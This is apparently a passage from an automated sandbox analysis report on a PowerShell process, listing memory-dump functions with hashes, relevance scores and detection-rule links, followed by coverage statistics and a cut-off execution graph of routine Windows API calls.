                                                                                  • Opcode ID: 709207335c66fb80e5fb5e66ef887bc01e56db5056bf25bf3d7fd91dc1766016
                                                                                  • Instruction ID: 40958451afc9c35b3d3f985e25cc638ba24e07e0c595744bc9a5269a55533a11
                                                                                  • Opcode Fuzzy Hash: 709207335c66fb80e5fb5e66ef887bc01e56db5056bf25bf3d7fd91dc1766016
                                                                                  • Instruction Fuzzy Hash: E50171B2F0C6190B9758994C68172B873C1FB89620F44123FE69EE2385DE25A813568A
                                                                                  Function 00007FFD33FD6680 Relevance: .6, Instructions: 614COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 04585643190ffee0632b61006c946e4286f82ebed0aef4aa1b329f7bde492919
                                                                                  • Instruction ID: efa629e8d0775701ed1b6cfa0a75aa6d1152c1a7e81bf77c5107ed47dabc814e
                                                                                  • Opcode Fuzzy Hash: 04585643190ffee0632b61006c946e4286f82ebed0aef4aa1b329f7bde492919
                                                                                  • Instruction Fuzzy Hash: 87223A34608A4D8FDFD8EF5CC898AA977E1FF68301B0501A9E95ED72A5DA35EC41CB40
                                                                                  Function 00007FFD340A356D Relevance: .4, Instructions: 420COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2360433888.00007FFD340A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd340a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7054efda85db83b4cbdaf5465e0d1bc4ce7f9f0c9610903b0552bc3f66a160d7
                                                                                  • Instruction ID: e2999d657612ca5bf9fe6c427f0bbb6895395d750529a5ac19ebf71cc058b7af
                                                                                  • Opcode Fuzzy Hash: 7054efda85db83b4cbdaf5465e0d1bc4ce7f9f0c9610903b0552bc3f66a160d7
                                                                                  • Instruction Fuzzy Hash: 42D12772B0EB8A0FE7E5DB7C88A55B97BE0EF56210B0800BED94DC7192DA2D9C05D741
                                                                                  Function 00007FFD33FDAE88 Relevance: .4, Instructions: 404COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 28074640c03247b09a50a5792e8dfe35931450c3be60a8c58b80ac8331fd6662
                                                                                  • Instruction ID: 899de7641f7706c2deaf0b1d264b9e1e9284c416883fe8736335263f7a4664d4
                                                                                  • Opcode Fuzzy Hash: 28074640c03247b09a50a5792e8dfe35931450c3be60a8c58b80ac8331fd6662
                                                                                  • Instruction Fuzzy Hash: FE31E412E0E6D20FEBA2A72C147D1A83FE09F16210B4A01FAD69CDB1E7D91D5C4A9356
                                                                                  Function 00007FFD33FD62BD Relevance: .3, Instructions: 308COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3d7cb92fb34abdd29698e0c46e9872ed42618741508afc47be660336059b194
                                                                                  • Instruction ID: e66992041cb707d963bc9c6a7817fa8973a2a4b3f011eb922a4c862d8e9abba2
                                                                                  • Opcode Fuzzy Hash: a3d7cb92fb34abdd29698e0c46e9872ed42618741508afc47be660336059b194
                                                                                  • Instruction Fuzzy Hash: 6E717A27B0D5214AE321B6BDB9692EA7B94DFC1337754433BD28CDA193DC28248B83D5
                                                                                  Function 00007FFD33FD6368 Relevance: .3, Instructions: 296COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c3ae32dcb76662aa04ca86e215095fdd333b061abd1e93daa8c691975161a040
                                                                                  • Instruction ID: 12d74eab7099a8f630b852c73c384b44f731dae765430660d1be8c0dfd809a16
                                                                                  • Opcode Fuzzy Hash: c3ae32dcb76662aa04ca86e215095fdd333b061abd1e93daa8c691975161a040
                                                                                  • Instruction Fuzzy Hash: 2571CC22B0D5120BE760B67C696D6FA3BD0CF81271B58437BD68CD7197DC28688683D5
                                                                                  Function 00007FFD33FD88AD Relevance: .3, Instructions: 269COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: adc45bcfb501636df173ba21b494cb456bf1d965889169c98997f7baf7a3d4ce
                                                                                  • Instruction ID: 727c069cde5e07a26bff96e1b583cf8839cb67f2fb2023b2f0b7aedd3c0d18d2
                                                                                  • Opcode Fuzzy Hash: adc45bcfb501636df173ba21b494cb456bf1d965889169c98997f7baf7a3d4ce
                                                                                  • Instruction Fuzzy Hash: 05714A31B0DA480FDB55E728D8A67B977E1EF85300F4401FAD54ED72ABDE29AC428381
                                                                                  Function 00007FFD33FD700D Relevance: .3, Instructions: 253COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ddc8eba49c4b3aeb23563f77be3d1ffb8b4c2b5e384a8f4ca85b1bae37351f2d
                                                                                  • Instruction ID: ffb89dfe20570f85b923d7c778e2908976f92608fc83b429af5a7e979891829e
                                                                                  • Opcode Fuzzy Hash: ddc8eba49c4b3aeb23563f77be3d1ffb8b4c2b5e384a8f4ca85b1bae37351f2d
                                                                                  • Instruction Fuzzy Hash: 57711A21F09D1A0FDBA0FB6C856D5BD63E2EF98310B800275E45ED72D6DE38AC829740
                                                                                  Function 00007FFD340A080E Relevance: .2, Instructions: 228COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2360433888.00007FFD340A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd340a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c9e39078cf28ea3cab59b001609c54ccf0601e211afa58f2579b0a42e964ccd5
                                                                                  • Instruction ID: 3501da09e2532216124d697a976adb8547328017f1cc178c36d24583b9b986db
                                                                                  • Opcode Fuzzy Hash: c9e39078cf28ea3cab59b001609c54ccf0601e211afa58f2579b0a42e964ccd5
                                                                                  • Instruction Fuzzy Hash: 33610422B0FA9A0FF7E5DA6C15B12B966D1EF96350B4800BEC69DC31D3DD0DA805A342
                                                                                  Function 00007FFD340A49EF Relevance: .2, Instructions: 220COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2360433888.00007FFD340A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd340a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e9911a842486db643f0b3d4ede0f1fd6e65ccb3bb527c9586dc4b92a7d421755
                                                                                  • Instruction ID: 272e398ba83f9f23e6dbb2a0da03229c0ee7f0467bef1c610238df9e59be30bc
                                                                                  • Opcode Fuzzy Hash: e9911a842486db643f0b3d4ede0f1fd6e65ccb3bb527c9586dc4b92a7d421755
                                                                                  • Instruction Fuzzy Hash: 3D610426F1FA860FE7E49A6848F52B866D1EF66311B1800BED14DC7192DD2DAC09A741
                                                                                  Function 00007FFD33FD75B5 Relevance: .2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0cb6fa67bbb97a516b2d0e9dfffc07f3ad902ebca83a17b342bebc1e45930257
                                                                                  • Instruction ID: 135648dc42a0e673c224dc1eb713e1ba86ead5e9d1e0f0e985faa0f955af7d9d
                                                                                  • Opcode Fuzzy Hash: 0cb6fa67bbb97a516b2d0e9dfffc07f3ad902ebca83a17b342bebc1e45930257
                                                                                  • Instruction Fuzzy Hash: 3B51263070AA494FD7A4EF6CD468A657BE0FF4931174501BAE48DCB266EE24EC85C781
                                                                                  Function 00007FFD33FDA9B0 Relevance: .2, Instructions: 175COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                  • Instruction ID: 3f4352af9e9fd7dc919e2c6d90b7cadd319ddf2d787979e8a98600bdfd1c2be7
                                                                                  • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                  • Instruction Fuzzy Hash: D341E63131581C8FDAA4EB1CE898E6977E1FF6831275505E6E44ECB275DA26DC81CB40
                                                                                  Function 00007FFD340A085A Relevance: .1, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2360433888.00007FFD340A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd340a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c86d0d72d88b0195dd6c5235074e02bc0992b772ab3beedaa810038beaa365bb
                                                                                  • Instruction ID: 2106c41ee9216e2736ebc061448f8e8bab2b133e71e566c23ddcec67366822d7
                                                                                  • Opcode Fuzzy Hash: c86d0d72d88b0195dd6c5235074e02bc0992b772ab3beedaa810038beaa365bb
                                                                                  • Instruction Fuzzy Hash: C741C053F0FA8F0BF7E5EA6805B52B856D1AF96250B5800BAC69DC31D3DD1DA8057242
                                                                                  Function 00007FFD33FD7C06 Relevance: .1, Instructions: 135COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 53805a26ab353166561e1d6a8d7386a8895929d86798a5399b7ef8630509aeec
                                                                                  • Instruction ID: 565cc8c8c037236a2f901f9fceb839b696ab10df506edf53d79cc27e5c9e7116
                                                                                  • Opcode Fuzzy Hash: 53805a26ab353166561e1d6a8d7386a8895929d86798a5399b7ef8630509aeec
                                                                                  • Instruction Fuzzy Hash: 4441E531F1D90A0BEFA8AB6844786BC63C2EF89304F940179E54ED72CBDD3CAC45A241
                                                                                  Function 00007FFD340A369C Relevance: .1, Instructions: 133COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2360433888.00007FFD340A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd340a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: faedf9bc4e67e2b8e81fc62369a499cbe026c5a282158882516b38c047f0c2f6
                                                                                  • Instruction ID: de506585c4f9a3ba08bbe769bd4999ecc7c63d953163dd74cd2dfd12607315a0
                                                                                  • Opcode Fuzzy Hash: faedf9bc4e67e2b8e81fc62369a499cbe026c5a282158882516b38c047f0c2f6
                                                                                  • Instruction Fuzzy Hash: 6A41B1A2F0FA860BE7E4963C94F56BC67D0AF16250F5800BAE94DD71D2DD2CAC44B340
                                                                                  Function 00007FFD33FD64D8 Relevance: .1, Instructions: 128COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3345097294d99034113e87ee2a1aed4c0d92fda9d4c03cea3a63fa17d4596da2
                                                                                  • Instruction ID: cb5b2743a241f500ec1330de6e2417dfe40ee39be9453ccd0d4480e596d89107
                                                                                  • Opcode Fuzzy Hash: 3345097294d99034113e87ee2a1aed4c0d92fda9d4c03cea3a63fa17d4596da2
                                                                                  • Instruction Fuzzy Hash: 6241DF20B1D9094FDFA4EB3CC468B6577D2EF99310B8402B9D14EDB296DE29EC82D744
                                                                                  Function 00007FFD33FD62A0 Relevance: .1, Instructions: 118COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ddad236ac0433c6ce035bfebc0bd1f469ad812a04fdb1171e1525831e7c9c477
                                                                                  • Instruction ID: 9a24b55f5b5d63dcb1881fb429c5f9bb017151c45839021b84d66edc51a98a53
                                                                                  • Opcode Fuzzy Hash: ddad236ac0433c6ce035bfebc0bd1f469ad812a04fdb1171e1525831e7c9c477
                                                                                  • Instruction Fuzzy Hash: 7C31C331B0950A4BEF54EA5CA4297FE77E1EF98310F80033AE50DE3295DE39685583C5
                                                                                  Function 00007FFD33FDA438 Relevance: .1, Instructions: 106COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8560b5712750bba27d2fc0f530768e8c6af2b71cd13362c2fe208495a1a77568
                                                                                  • Instruction ID: a0599f4109d2ce96e6fdc3e0347b32a5ed0653423681eba5c1ee86becb01c11a
                                                                                  • Opcode Fuzzy Hash: 8560b5712750bba27d2fc0f530768e8c6af2b71cd13362c2fe208495a1a77568
                                                                                  • Instruction Fuzzy Hash: 8B317E31A0990E4BEF94EE5C94297BA73E1EF98310F800339E50DE3299DE3968559781
                                                                                  Function 00007FFD33FDA72F Relevance: .1, Instructions: 92COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4dc2955bd3f04e8122444426e35f68bef79ca0cb6d8f7be2ffd25a86d0aa47d6
                                                                                  • Instruction ID: 21c8abd5d305803b720c163a2773a8404d3ea06d1159bcd19f6e36f6a538373a
                                                                                  • Opcode Fuzzy Hash: 4dc2955bd3f04e8122444426e35f68bef79ca0cb6d8f7be2ffd25a86d0aa47d6
                                                                                  • Instruction Fuzzy Hash: 8E210821B1DA090FEB94FA3C446D2797BD1DF58211B54067FD84EE32A7DD29A8418381
                                                                                  Function 00007FFD33FD98D1 Relevance: .1, Instructions: 87COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d122ead0ef6d22abf412f2609b8b2c8db9c4591c87192c6ed4ac070ff0f02f7d
                                                                                  • Instruction ID: 211e7b97a472730b9eb72a1e0fa8046535e97e1d2e887497e9a5e864fdaa08a3
                                                                                  • Opcode Fuzzy Hash: d122ead0ef6d22abf412f2609b8b2c8db9c4591c87192c6ed4ac070ff0f02f7d
                                                                                  • Instruction Fuzzy Hash: C821AE31219E488FCB94EB2CC5A896573E1FB5931178506ADD08BC7AA1DA25FC41C741
                                                                                  Function 00007FFD33FDA991 Relevance: .1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0fc0924489ed1063aa7ff8cb2ebf5245baf7d68a53083ef326f670300dd9f0c6
                                                                                  • Instruction ID: 126ce93e63f1327bd310e2127601712b9ce2451e8e3ee23dd7a962318a7f43fe
                                                                                  • Opcode Fuzzy Hash: 0fc0924489ed1063aa7ff8cb2ebf5245baf7d68a53083ef326f670300dd9f0c6
                                                                                  • Instruction Fuzzy Hash: 7D21903120E9984FDB91EB3CD8AC9647FE0EF1A31135A02E7D08DCB1A6EA25DC80C741
                                                                                  Function 00007FFD33FDA5E8 Relevance: .1, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b8b129d29a2144b812b27f34f4d78e4c3f11b9c215d4f0e61c53611ddddabea6
                                                                                  • Instruction ID: 74609a118c3b30fab2712a5706fce5024153cb99f7139d4a77d9db709dba1e8d
                                                                                  • Opcode Fuzzy Hash: b8b129d29a2144b812b27f34f4d78e4c3f11b9c215d4f0e61c53611ddddabea6
                                                                                  • Instruction Fuzzy Hash: 45118C32A0E9884FDB11A72888648E57BE5EB86310B0503ABD04DC71D2D9696887C385
                                                                                  Function 00007FFD33FDAAF2 Relevance: .1, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 01f69e7a7b084d52215074c9005cd0f5ccd79f96812c4a84ad42a80f68d3f3c1
                                                                                  • Instruction ID: d7b771071accb254360750c3635c7afb2fd3f50b9275d0c8ff6079c35f914d8e
                                                                                  • Opcode Fuzzy Hash: 01f69e7a7b084d52215074c9005cd0f5ccd79f96812c4a84ad42a80f68d3f3c1
                                                                                  • Instruction Fuzzy Hash: 52217230609A494FDF95DB2CC454F617BE1EF55300F5942E9D44DDB2A2DA29EC82CB40
                                                                                  Function 00007FFD33FD3975 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction ID: 293cf168ac3c7c116800d4dae527243c098eb3a9d2362a696d2ba76d73dd40cd
                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction Fuzzy Hash: 4301A73020CB0C4FD744EF0CE051AA5B3E0FB85360F10062EE58AC3651D632E882CB42
                                                                                  Function 00007FFD33FDA5AB Relevance: .0, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 72a85f1480a6bbd982bd99118a88219c40231df1c1f69b210d0fa6e456e087dd
                                                                                  • Instruction ID: 507b9f6d4271c8da5d8ca4abe01366fdaa4d00cf1cb63d782fa5a07abec6e4f7
                                                                                  • Opcode Fuzzy Hash: 72a85f1480a6bbd982bd99118a88219c40231df1c1f69b210d0fa6e456e087dd
                                                                                  • Instruction Fuzzy Hash: 68F04633A1E94C47EF10A66CEC249E87BA0EFC5368F08027AE51CD3191EA355C56D30A

                                                                                  Non-executed Functions

                                                                                  Function 00007FFD33FD3B2D Relevance: .2, Instructions: 241COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bc4175514e111d2722682efa6950afc11804eb27f6b3d1d9846c1a617c76cc55
                                                                                  • Instruction ID: c62d8d3e4eac3a38b9db9860fd62508029247daba50b85cdbd597159456558fc
                                                                                  • Opcode Fuzzy Hash: bc4175514e111d2722682efa6950afc11804eb27f6b3d1d9846c1a617c76cc55
                                                                                  • Instruction Fuzzy Hash: F671B45BB0F7D22FE713563C5C7A4D63FE0DF5322574901FBC788DA093A91A180AA262
                                                                                  Function 00007FFD33FD8261 Relevance: 11.7, Strings: 9, Instructions: 424COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @7[C$H7[C$P7[C$X7[C$`7[C$h7[C$p7[C$p7[C$x6[C
                                                                                  • API String ID: 0-357289539
                                                                                  • Opcode ID: 3f82ca2618cc0dd39eaf2a6fd2ab516b398f806acd84edf0951dd5c1234fba12
                                                                                  • Instruction ID: 5212044d8705fd0505b18ed06fd577efb77b72e256f75b3fc9253e7e49d3ab76
                                                                                  • Opcode Fuzzy Hash: 3f82ca2618cc0dd39eaf2a6fd2ab516b398f806acd84edf0951dd5c1234fba12
                                                                                  • Instruction Fuzzy Hash: 4BD14430B0D64A0FE759AB7894262B977D5EF86320F1542BDD58EC72A7ED3DAC428340

                                                                                  Execution Graph

                                                                                  Execution Coverage:6%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:15%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:78
                                                                                  execution_graph 86796 110179e0 GetTickCount 86803 110178f0 86796->86803 86804 11017910 86803->86804 86805 110179c6 86803->86805 86806 11017932 CoInitialize _GetRawWMIStringW 86804->86806 86808 11017929 WaitForSingleObject 86804->86808 86835 11162bb7 86805->86835 86809 110179b2 86806->86809 86812 11017965 86806->86812 86808->86806 86809->86805 86811 110179c0 CoUninitialize 86809->86811 86810 110179d5 86816 11017810 86810->86816 86811->86805 86812->86809 86813 110179ac 86812->86813 86843 111648ed 86812->86843 86848 111646f7 67 API calls __fassign 86813->86848 86817 11017830 86816->86817 86823 110178d6 86816->86823 86818 11017848 CoInitialize _GetRawWMIStringW 86817->86818 86820 1101783f WaitForSingleObject 86817->86820 86824 110178c2 86818->86824 86828 1101787b 86818->86828 86819 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 86821 110178e5 SetEvent GetTickCount 86819->86821 86820->86818 86829 11147060 86821->86829 86822 110178d0 CoUninitialize 86822->86823 86823->86819 86824->86822 86824->86823 86825 110178bc 86851 111646f7 67 API calls __fassign 86825->86851 86827 111648ed __input_l 79 API calls 86827->86828 86828->86824 86828->86825 86828->86827 86830 11147071 86829->86830 86831 1114706c 86829->86831 86853 111464c0 86830->86853 86852 11146270 18 API calls std::locale::facet::_Facet_Register 86831->86852 86836 11162bc1 IsDebuggerPresent 86835->86836 86837 11162bbf 86835->86837 86849 111784f7 86836->86849 86837->86810 86840 1116cb59 SetUnhandledExceptionFilter UnhandledExceptionFilter 86841 1116cb76 __call_reportfault 86840->86841 86842 1116cb7e GetCurrentProcess TerminateProcess 86840->86842 86841->86842 86842->86810 86844 1116490d 86843->86844 86845 111648fb 86843->86845 86850 1116489c 79 API calls 2 library calls 86844->86850 86845->86812 86847 11164917 86847->86812 86848->86809 86849->86840 86850->86847 86851->86824 86852->86830 86856 11146370 86853->86856 86855 11017a27 86857 11146394 86856->86857 86858 11146399 86856->86858 86876 11146270 18 API calls std::locale::facet::_Facet_Register 86857->86876 86860 11146402 86858->86860 86861 111463a2 86858->86861 86862 111464ae 86860->86862 86863 1114640f wsprintfA 86860->86863 86864 111463d9 86861->86864 86867 111463b0 86861->86867 86865 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 86862->86865 86866 11146432 86863->86866 86870 11162bb7 